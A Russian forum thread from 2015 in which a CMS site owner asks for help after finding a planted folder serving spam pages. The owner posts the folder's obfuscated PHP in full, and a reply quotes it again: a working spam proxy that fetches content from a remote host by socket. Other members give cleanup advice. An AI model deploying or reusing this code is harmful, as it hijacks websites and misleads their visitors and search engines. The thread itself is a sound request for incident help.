Форум UnitCMS

Взлом?

maryar

Взлом?
« : Февраль 25, 2015, 12:02:34 pm »
Ребята, что это?
 На сайте появилась папка /templates/
Яндекс видит подобные страницы 1000 штук ваш сайт.ru/templates/zhenskaya-viagra/

Смотрю, что много сайтов на lego SP с подобной ерундой.

Что я могу сделать, кроме как удалить эту папку и поменять пароль?
 

nictboom

Re: Взлом?
« Ответ #1 : Февраль 25, 2015, 01:18:51 pm »
может и взлом.
если нет бэкапа, смотрите на ftp по дате изменения файлов. или, как вариант, если сильно не меняли основные php и js, путем сравнения(winmerge, kdiff) с базовой версией. хотя не исключение что может быть зашито и в шаблон.
« Последнее редактирование: Февраль 25, 2015, 01:24:40 pm от nictboom »
 

pehser

Re: Взлом?
« Ответ #2 : Февраль 25, 2015, 02:39:33 pm »
Какая версия леги и какое содержимое папки если посмотреть через файлменеджер?
WM: Z255040886923, R104460203223, U381335345755 Yandex: 41001700114942
---
Я пользуюсь обменником
 

maryar

Re: Взлом?
« Ответ #3 : Февраль 25, 2015, 04:36:01 pm »
версия 6.1, в этой папке templates 2 файла
index.php
htaccess

index.php закодирован, вот содержимое:
<? $GLOBALS['_1181401878_']=Array(base64_decode('cHJlZ1' .'9' .'yZXBsY' .'WNl'),base64_decode('aW1hZ2' .'Vjcm' .'V' .'hdGVmcm' .'9tanBlZ' .'w=' .'='),base64_decode('bXRfcmFuZ' .'A=='),base64_decode('aW1hZ2' .'Vjb3B5b' .'WVyZ2Vnc' .'mF5'),base64_decode('b' .'XRfcmFuZ' .'A' .'=='),base64_decode('cGFyc2V' .'f' .'dXJs'),base64_decode('Zn' .'NvY' .'2' .'tvcGVu'),base64_decode('bXR' .'fcmFuZA=='),base64_decode('Zm' .'x' .'v' .'Y2s' .'='),base64_decode('' .'c3Ryb' .'G' .'Vu'),base64_decode('YXJy' .'Y' .'Xlf' .'a2' .'V' .'5' .'c' .'w=='),base64_decode('YmFzZTY0X2' .'RlY2' .'9kZQ=='),base64_decode('Zm' .'l' .'sZV9leG' .'lzdH' .'M' .'='),base64_decode('c3Ryc3Bu'),base64_decode('ZndyaX' .'Rl'),base64_decode('c3Ryc' .'G9z'),base64_decode('' .'b2JfY2xl' .'Y' .'W' .'4='),base64_decode('ZmVvZg=='),base64_decode('ZmdldHM='),base64_decode('bmwyYnI='),base64_decode('bXRfcmFuZA=' .'='),base64_decode('c3Vic3Ry'),base64_decode('c' .'3R' .'y' .'cG9z'),base64_decode('' .'ZmN' .'sb3Nl'),base64_decode('' .'c3' .'R' .'ycG9z'),base64_decode('ZmdldG' .'M='),base64_decode('c3Ryc' .'3Ry'),base64_decode('aGV' .'hZGV' .'y'),base64_decode('c3R' .'y' .'c3Ry'),base64_decode('a' .'GVhZGVy'),base64_decode('c3Ryc3R' .'y'),base64_decode('c3Ryc3Ry'),base64_decode('aGVhZGVy'),base64_decode('c3' .'Ryc3Ry'),base64_decode('aG' .'VhZGV' .'y'),base64_decode('c3R' .'ycG' .'9z'),base64_decode('bX' .'R' .'fc' .'mF' .'uZ' .'A=='),base64_decode('' .'aGV' .'hZGVy')); ?><? function _473001988($i){$a=Array('aWQ=','aWR0','aH' .'R0cDov' .'L2N' .'vb2' .'wtc2' .'hpcnQuc' .'nU' .'v' .'MzMv','I1' .'53' .'d3dcLiM' .'=','','SF' .'R' .'UUF9IT' .'1NU','Lw==','' .'P2lkdD0=','','' .'a' .'G' .'9zdA=' .'=','cG' .'9y' .'dA==','' .'c' .'G9' .'yd' .'A==','UE9TV' .'CA=','cGF0a' .'A==','Pw==','cX' .'Vlcnk=','IEhUV' .'FA' .'vMS4w','DQo=','SG' .'9zdD' .'og','aG9z' .'dA' .'==','DQo=','Q29' .'udGVu' .'d' .'C10eXB' .'lOiB0ZXh0L' .'2h0bWw=','DQo' .'=','Q29u' .'dGV' .'udC' .'1sZW5' .'n' .'dGg6IA==','DQo=','Q29u' .'bmVjdGlvb' .'jogQ2x' .'vc2U' .'=','DQ' .'oN' .'Cg' .'==','','bGVvcnBhY3' .'J3Y' .'3V' .'vbGlvanU=','aXo' .'=','' .'DQoNCg' .'==','bmJza' .'W' .'h3ZGhkZ' .'2tw','' .'Z2x6','LmNzc' .'w==','Q2' .'9ud' .'G' .'VudC1UeXB' .'lOiB' .'0' .'Z' .'X' .'h0L' .'2Nzczs' .'gY2hhcnN' .'ld' .'D' .'11d' .'GYtOA' .'==','LnBu' .'Zw' .'==','Q2' .'9udGVudC1UeX' .'B' .'l' .'O' .'i' .'BpbWFnZ' .'S' .'9wbmc=','LmpwZ' .'w==','Lmpw' .'ZWc=','Q29udGVudC1UeXBlOiBpbWFnZ' .'S9qcGVn','Lmdp' .'Z' .'g==','Q' .'29ud' .'GV' .'udC1' .'UeXBlOiBpbWF' .'nZS9na' .'WY=','Q' .'2' .'9u' .'dGVu' .'dC1UeXB' .'lOiB0' .'Z' .'Xh0L2h0bWw7IGNoYXJzZXQ9d' .'XRmLTg' .'=');return base64_decode($a[$i]);} ?><?php $_0=$_REQUEST[_473001988(0)];$_1=$_REQUEST[_473001988(1)];$_2=_473001988(2) .$GLOBALS['_1181401878_'][0](_473001988(3),_473001988(4),$_SERVER[_473001988(5)]) ._473001988(6) .$_0 ._473001988(7) .$_1;(round(0+2293.5+2293.5)-round(0+1146.75+1146.75+1146.75+1146.75)+round(0+1633.5+1633.5)-round(0+1633.5+1633.5))?$GLOBALS['_1181401878_'][1]($_1,$_1,$_3,$_4):$GLOBALS['_1181401878_'][2](round(0+1472+1472),round(0+917.4+917.4+917.4+917.4+917.4));$_5=_473001988(8);(round(0+908.25+908.25+908.25+908.25)-round(0+3633)+round(0+1003.25+1003.25+1003.25+1003.25)-round(0+1003.25+1003.25+1003.25+1003.25))?$GLOBALS['_1181401878_'][3]($_6,$_3,$_SERVER,$_5,$_1):$GLOBALS['_1181401878_'][4](round(0+158.25+158.25+158.25+158.25),round(0+726.6+726.6+726.6+726.6+726.6));$_7=$GLOBALS['_1181401878_'][5]($_2);$_8=round(0+660+660);if($_4=$GLOBALS['_1181401878_'][6]($_7[_473001988(9)],!empty($_7[_473001988(10)])?$_7[_473001988(11)]:round(0+16+16+16+16+16))){$_9=_473001988(12) .$_7[_473001988(13)] ._473001988(14) .$_7[_473001988(15)] ._473001988(16) ._473001988(17);$_9 .= _473001988(18) .$_7[_473001988(19)] ._473001988(20);$_9 .= _473001988(21) ._473001988(22);if(round(0+1026.25+1026.25+1026.25+1026.25)<$GLOBALS['_1181401878_'][7](round(0+360),round(0+1246.6666666667+1246.6666666667+1246.6666666667)))$GLOBALS['_1181401878_'][8]($_5,$_5);$_9 .= _473001988(23) .$GLOBALS['_1181401878_'][9]($_5) ._473001988(24);if((round(0+824.2+824.2+824.2+824.2+824.2)^round(0+4121))&& $GLOBALS['_1181401878_'][10]($_6,$_3,$_0))$GLOBALS['_1181401878_'][11]($_6,$_4,$_5);$_9 .= _473001988(25) ._473001988(26);if((round(0+312.8+312.8+312.8+312.8+312.8)+round(0+149))>round(0+521.33333333333+521.33333333333+521.33333333333)|| $GLOBALS['_1181401878_'][12]($_REQUEST));else{$GLOBALS['_1181401878_'][13]($_2,$_1);}$_9 .= $_5;$GLOBALS['_1181401878_'][14]($_4,$_9);$_3=_473001988(27);if($GLOBALS['_1181401878_'][15](_473001988(28),_473001988(29))!==false)$GLOBALS['_1181401878_'][16]($_2,$_SERVER);while(!$GLOBALS['_1181401878_'][17]($_4)){$_3 .= $GLOBALS['_1181401878_'][18]($_4,round(0+256+256+256+256));(round(0+1572+1572)-round(0+1048+1048+1048)+round(0+672+672)-round(0+336+336+336+336))?$GLOBALS['_1181401878_'][19]($_SERVER,$_2,$_5):$GLOBALS['_1181401878_'][20](round(0+160),round(0+1572+1572));}$_6=$GLOBALS['_1181401878_'][21]($_3,$GLOBALS['_1181401878_'][22]($_3,_473001988(30))+round(0+2+2));$GLOBALS['_1181401878_'][23]($_4);if($GLOBALS['_1181401878_'][24](_473001988(31),_473001988(32))!==false)$GLOBALS['_1181401878_'][25]($_7);}if($GLOBALS['_1181401878_'][26]($_0,_473001988(33))){$GLOBALS['_1181401878_'][27](_473001988(34));}elseif($GLOBALS['_1181401878_'][28]($_0,_473001988(35))){$GLOBALS['_1181401878_'][29](_473001988(36));}elseif($GLOBALS['_1181401878_'][30]($_0,_473001988(37))|| $GLOBALS['_1181401878_'][31]($_0,_473001988(38))){$GLOBALS['_1181401878_'][32](_473001988(39));}elseif($GLOBALS['_1181401878_'][33]($_0,_473001988(40))){$GLOBALS['_1181401878_'][34](_473001988(41));(round(0+867+867+867+867+867)-round(0+2167.5+2167.5)+round(0+483.4+483.4+483.4+483.4+483.4)-round(0+1208.5+1208.5))?$GLOBALS['_1181401878_'][35]($_3,$_REQUEST,$_9):$GLOBALS['_1181401878_'][36](round(0+1568+1568),round(0+2167.5+2167.5));}else{$GLOBALS['_1181401878_'][37](_473001988(42));}echo $_6; ?>


Хостер пишет:
"Имеется вредоносный код. Пример файла ./update/includes/admin/sub/tst.php
Вам необходимо обратиться к профильным специалистам и провести полный анализ установленных модулей на сайте а так же удалить вредоносный код сайта. С нашей стороны можем предложить Вам запустить утилиту AIBOLIT и предоставить Вам отчет о проверке сайтов на Вашем аккуанте."
 

pehser

Re: Взлом?
« Ответ #4 : Февраль 25, 2015, 05:15:58 pm »
версия 6.1, в этой папке templates 2 файла
index.php
htaccess

index.php закодирован, вот содержимое:
<? $GLOBALS['_1181401878_']=Array(base64_decode('cHJlZ1' .'9' .'yZXBsY' .'WNl'),base64_decode('aW1hZ2' .'Vjcm' .'V' .'hdGVmcm' .'9tanBlZ' .'w=' .'='),base64_decode('bXRfcmFuZ' .'A=='),base64_decode('aW1hZ2' .'Vjb3B5b' .'WVyZ2Vnc' .'mF5'),base64_decode('b' .'XRfcmFuZ' .'A' .'=='),base64_decode('cGFyc2V' .'f' .'dXJs'),base64_decode('Zn' .'NvY' .'2' .'tvcGVu'),base64_decode('bXR' .'fcmFuZA=='),base64_decode('Zm' .'x' .'v' .'Y2s' .'='),base64_decode('' .'c3Ryb' .'G' .'Vu'),base64_decode('YXJy' .'Y' .'Xlf' .'a2' .'V' .'5' .'c' .'w=='),base64_decode('YmFzZTY0X2' .'RlY2' .'9kZQ=='),base64_decode('Zm' .'l' .'sZV9leG' .'lzdH' .'M' .'='),base64_decode('c3Ryc3Bu'),base64_decode('ZndyaX' .'Rl'),base64_decode('c3Ryc' .'G9z'),base64_decode('' .'b2JfY2xl' .'Y' .'W' .'4='),base64_decode('ZmVvZg=='),base64_decode('ZmdldHM='),base64_decode('bmwyYnI='),base64_decode('bXRfcmFuZA=' .'='),base64_decode('c3Vic3Ry'),base64_decode('c' .'3R' .'y' .'cG9z'),base64_decode('' .'ZmN' .'sb3Nl'),base64_decode('' .'c3' .'R' .'ycG9z'),base64_decode('ZmdldG' .'M='),base64_decode('c3Ryc' .'3Ry'),base64_decode('aGV' .'hZGV' .'y'),base64_decode('c3R' .'y' .'c3Ry'),base64_decode('a' .'GVhZGVy'),base64_decode('c3Ryc3R' .'y'),base64_decode('c3Ryc3Ry'),base64_decode('aGVhZGVy'),base64_decode('c3' .'Ryc3Ry'),base64_decode('aG' .'VhZGV' .'y'),base64_decode('c3R' .'ycG' .'9z'),base64_decode('bX' .'R' .'fc' .'mF' .'uZ' .'A=='),base64_decode('' .'aGV' .'hZGVy')); ?><? function _473001988($i){$a=Array('aWQ=','aWR0','aH' .'R0cDov' .'L2N' .'vb2' .'wtc2' .'hpcnQuc' .'nU' .'v' .'MzMv','I1' .'53' .'d3dcLiM' .'=','','SF' .'R' .'UUF9IT' .'1NU','Lw==','' .'P2lkdD0=','','' .'a' .'G' .'9zdA=' .'=','cG' .'9y' .'dA==','' .'c' .'G9' .'yd' .'A==','UE9TV' .'CA=','cGF0a' .'A==','Pw==','cX' .'Vlcnk=','IEhUV' .'FA' .'vMS4w','DQo=','SG' .'9zdD' .'og','aG9z' .'dA' .'==','DQo=','Q29' .'udGVu' .'d' .'C10eXB' .'lOiB0ZXh0L' .'2h0bWw=','DQo' .'=','Q29u' .'dGV' .'udC' .'1sZW5' .'n' .'dGg6IA==','DQo=','Q29u' .'bmVjdGlvb' .'jogQ2x' .'vc2U' .'=','DQ' .'oN' .'Cg' .'==','','bGVvcnBhY3' .'J3Y' .'3V' .'vbGlvanU=','aXo' .'=','' .'DQoNCg' .'==','bmJza' .'W' .'h3ZGhkZ' .'2tw','' .'Z2x6','LmNzc' .'w==','Q2' .'9ud' .'G' .'VudC1UeXB' .'lOiB' .'0' .'Z' .'X' .'h0L' .'2Nzczs' .'gY2hhcnN' .'ld' .'D' .'11d' .'GYtOA' .'==','LnBu' .'Zw' .'==','Q2' .'9udGVudC1UeX' .'B' .'l' .'O' .'i' .'BpbWFnZ' .'S' .'9wbmc=','LmpwZ' .'w==','Lmpw' .'ZWc=','Q29udGVudC1UeXBlOiBpbWFnZ' .'S9qcGVn','Lmdp' .'Z' .'g==','Q' .'29ud' .'GV' .'udC1' .'UeXBlOiBpbWF' .'nZS9na' .'WY=','Q' .'2' .'9u' .'dGVu' .'dC1UeXB' .'lOiB0' .'Z' .'Xh0L2h0bWw7IGNoYXJzZXQ9d' .'XRmLTg' .'=');return base64_decode($a[$i]);} ?><?php $_0=$_REQUEST[_473001988(0)];$_1=$_REQUEST[_473001988(1)];$_2=_473001988(2) .$GLOBALS['_1181401878_'][0](_473001988(3),_473001988(4),$_SERVER[_473001988(5)]) ._473001988(6) .$_0 ._473001988(7) .$_1;(round(0+2293.5+2293.5)-round(0+1146.75+1146.75+1146.75+1146.75)+round(0+1633.5+1633.5)-round(0+1633.5+1633.5))?$GLOBALS['_1181401878_'][1]($_1,$_1,$_3,$_4):$GLOBALS['_1181401878_'][2](round(0+1472+1472),round(0+917.4+917.4+917.4+917.4+917.4));$_5=_473001988(8);(round(0+908.25+908.25+908.25+908.25)-round(0+3633)+round(0+1003.25+1003.25+1003.25+1003.25)-round(0+1003.25+1003.25+1003.25+1003.25))?$GLOBALS['_1181401878_'][3]($_6,$_3,$_SERVER,$_5,$_1):$GLOBALS['_1181401878_'][4](round(0+158.25+158.25+158.25+158.25),round(0+726.6+726.6+726.6+726.6+726.6));$_7=$GLOBALS['_1181401878_'][5]($_2);$_8=round(0+660+660);if($_4=$GLOBALS['_1181401878_'][6]($_7[_473001988(9)],!empty($_7[_473001988(10)])?$_7[_473001988(11)]:round(0+16+16+16+16+16))){$_9=_473001988(12) .$_7[_473001988(13)] ._473001988(14) .$_7[_473001988(15)] ._473001988(16) ._473001988(17);$_9 .= _473001988(18) .$_7[_473001988(19)] ._473001988(20);$_9 .= _473001988(21) ._473001988(22);if(round(0+1026.25+1026.25+1026.25+1026.25)<$GLOBALS['_1181401878_'][7](round(0+360),round(0+1246.6666666667+1246.6666666667+1246.6666666667)))$GLOBALS['_1181401878_'][8]($_5,$_5);$_9 .= _473001988(23) .$GLOBALS['_1181401878_'][9]($_5) ._473001988(24);if((round(0+824.2+824.2+824.2+824.2+824.2)^round(0+4121))&& $GLOBALS['_1181401878_'][10]($_6,$_3,$_0))$GLOBALS['_1181401878_'][11]($_6,$_4,$_5);$_9 .= _473001988(25) ._473001988(26);if((round(0+312.8+312.8+312.8+312.8+312.8)+round(0+149))>round(0+521.33333333333+521.33333333333+521.33333333333)|| $GLOBALS['_1181401878_'][12]($_REQUEST));else{$GLOBALS['_1181401878_'][13]($_2,$_1);}$_9 .= $_5;$GLOBALS['_1181401878_'][14]($_4,$_9);$_3=_473001988(27);if($GLOBALS['_1181401878_'][15](_473001988(28),_473001988(29))!==false)$GLOBALS['_1181401878_'][16]($_2,$_SERVER);while(!$GLOBALS['_1181401878_'][17]($_4)){$_3 .= $GLOBALS['_1181401878_'][18]($_4,round(0+256+256+256+256));(round(0+1572+1572)-round(0+1048+1048+1048)+round(0+672+672)-round(0+336+336+336+336))?$GLOBALS['_1181401878_'][19]($_SERVER,$_2,$_5):$GLOBALS['_1181401878_'][20](round(0+160),round(0+1572+1572));}$_6=$GLOBALS['_1181401878_'][21]($_3,$GLOBALS['_1181401878_'][22]($_3,_473001988(30))+round(0+2+2));$GLOBALS['_1181401878_'][23]($_4);if($GLOBALS['_1181401878_'][24](_473001988(31),_473001988(32))!==false)$GLOBALS['_1181401878_'][25]($_7);}if($GLOBALS['_1181401878_'][26]($_0,_473001988(33))){$GLOBALS['_1181401878_'][27](_473001988(34));}elseif($GLOBALS['_1181401878_'][28]($_0,_473001988(35))){$GLOBALS['_1181401878_'][29](_473001988(36));}elseif($GLOBALS['_1181401878_'][30]($_0,_473001988(37))|| $GLOBALS['_1181401878_'][31]($_0,_473001988(38))){$GLOBALS['_1181401878_'][32](_473001988(39));}elseif($GLOBALS['_1181401878_'][33]($_0,_473001988(40))){$GLOBALS['_1181401878_'][34](_473001988(41));(round(0+867+867+867+867+867)-round(0+2167.5+2167.5)+round(0+483.4+483.4+483.4+483.4+483.4)-round(0+1208.5+1208.5))?$GLOBALS['_1181401878_'][35]($_3,$_REQUEST,$_9):$GLOBALS['_1181401878_'][36](round(0+1568+1568),round(0+2167.5+2167.5));}else{$GLOBALS['_1181401878_'][37](_473001988(42));}echo $_6; ?>


Хостер пишет:
"Имеется вредоносный код. Пример файла ./update/includes/admin/sub/tst.php
Вам необходимо обратиться к профильным специалистам и провести полный анализ установленных модулей на сайте а так же удалить вредоносный код сайта. С нашей стороны можем предложить Вам запустить утилиту AIBOLIT и предоставить Вам отчет о проверке сайтов на Вашем аккуанте."

у вас явно вирус!
а что за папка update
tst.php это какойто левый фаил смело можно грохать
WM: Z255040886923, R104460203223, U381335345755 Yandex: 41001700114942
---
Я пользуюсь обменником
 

maryar

Re: Взлом?
« Ответ #5 : Февраль 25, 2015, 05:31:37 pm »
Папки не было раньше, ни update, ни template. Никто не добавлял их, значит левые.
Удалю все это и буду смотреть, где еще может быть такое.

Жалко раньше не заметили вирус, 1000 страниц уже проиндексировалось с виагрой, а сейчас там будут 404 ошибки.

Спасибо за ответы.
 

nictboom

Re: Взлом?
« Ответ #6 : Февраль 26, 2015, 12:00:17 am »
опять же, рекомендация, пройтись по дате изменения всех файлов в фтп.
не факт, что просто удаление оной поможет.
 

maryar

Re: Взлом?
« Ответ #7 : Февраль 26, 2015, 10:39:10 am »
да, спасибо.
понятно, что дыра не прикрыта
буду смотреть
думаю, что были неправильно выставлены права

 

 

Sitemap 1 2 3 4 5